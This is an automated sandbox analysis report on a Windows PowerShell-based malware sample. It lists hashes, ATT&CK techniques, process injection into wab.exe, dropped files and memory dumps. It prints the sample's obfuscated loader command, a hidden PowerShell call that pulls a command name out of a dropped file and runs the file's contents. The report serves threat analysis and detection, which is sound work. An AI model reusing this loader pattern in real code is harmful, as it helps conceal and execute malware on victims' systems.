8ef4d6591309fbe5f7998a82ea2db9db9c502293abf51fe37e37d860b2977d7c

General

Target

SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe
Size

708KB
MD5

1fdc4210c29446f1358360b7df89eb3e
SHA1

feabe794bd8654ceaa0d2a2588b252fed6cae378
SHA256

8ef4d6591309fbe5f7998a82ea2db9db9c502293abf51fe37e37d860b2977d7c
SHA512

4f30ad8c74e270d7cc88f3de29fd9a2530a378b07cd5efce7867e19e007472f89da0b6a1fcc97871f4b3e16d65513369b6c34f6e4144983afcebfe35965e337a
SSDEEP

12288:QuoS1Rnqm/L+toFP3ke8cfDynok2l19jjk9CTe13c:HT1Rqm/kol3Kn619k+

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2220 powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2220 powershell.exe
2696 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2220 set thread context of 2696 2220 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2220 set thread context of 2696	2220	powershell.exe	wab.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exe

pid	process
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2220 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2220 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2220	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exepowershell.exe

description	pid	process	target process
PID 1972 wrote to memory of 2220	1972	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	powershell.exe
PID 1972 wrote to memory of 2220	1972	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	powershell.exe
PID 1972 wrote to memory of 2220	1972	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	powershell.exe
PID 1972 wrote to memory of 2220	1972	SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe	powershell.exe
PID 2220 wrote to memory of 2908	2220	powershell.exe	cmd.exe
PID 2220 wrote to memory of 2908	2220	powershell.exe	cmd.exe
PID 2220 wrote to memory of 2908	2220	powershell.exe	cmd.exe
PID 2220 wrote to memory of 2908	2220	powershell.exe	cmd.exe
PID 2220 wrote to memory of 2696	2220	powershell.exe	wab.exe
PID 2220 wrote to memory of 2696	2220	powershell.exe	wab.exe
PID 2220 wrote to memory of 2696	2220	powershell.exe	wab.exe
PID 2220 wrote to memory of 2696	2220	powershell.exe	wab.exe
PID 2220 wrote to memory of 2696	2220	powershell.exe	wab.exe
PID 2220 wrote to memory of 2696	2220	powershell.exe	wab.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Induktionen=Get-Content 'C:\Users\Admin\AppData\Roaming\Neurospasm0\oversaturate\bronzeres\Rykkerbrev.Rin';$Noncredibility=$Induktionen.SubString(54173,3);.$Noncredibility($Induktionen)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
3⤵
PID:2908

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Neurospasm0\oversaturate\bronzeres\Besonnet198.Srb

Filesize
318KB

MD5
f7fdc5a99007f4b2f31937dd8205c668

SHA1
6a08dffb90f21565641c0660b444ecbffc875fb0

SHA256
62c4dabf9dac154bf2d18d42cc1c72944d5e69109d9367211a89580ba6760583

SHA512
f0cca3d85832339233259e9d8f37ccc570faca62f26fd5554c0e1415e5368c1afacbe83039124927651ff33bb260a9c604912073ff3fe258f9036091afb92980

Download Submit
C:\Users\Admin\AppData\Roaming\Neurospasm0\oversaturate\bronzeres\Rykkerbrev.Rin

Filesize
52KB

MD5
8feef5a2d2851a6927d27a3cdb9ef266

SHA1
951b7b70b5523c1a2252d2924b03335d92e73912

SHA256
df187dabada995e329a11f1d8eed38813eb43509252597db7e67706287be95a5

SHA512
458ee8fc14f094352d2e3c67e4ce7d452a0b6e5041898f2b852920e90c621665f22f53f09a56972db23e4b3c12e390c589292c4fd2777d5a0f36495ba1b2e578

Download Submit
memory/2220-12-0x0000000074141000-0x0000000074142000-memory.dmp

Filesize
4KB

Download
memory/2220-13-0x0000000074140000-0x00000000746EB000-memory.dmp

Filesize
5.7MB

Download
memory/2220-14-0x0000000074140000-0x00000000746EB000-memory.dmp

Filesize
5.7MB

Download
memory/2220-15-0x0000000074140000-0x00000000746EB000-memory.dmp

Filesize
5.7MB

Download
memory/2220-19-0x0000000006720000-0x0000000009F08000-memory.dmp

Filesize
55.9MB

Download
memory/2220-20-0x0000000074140000-0x00000000746EB000-memory.dmp

Filesize
5.7MB

Download
memory/2696-21-0x0000000000CA0000-0x0000000001D02000-memory.dmp

Filesize
16.4MB

Download

Analysis

Sharing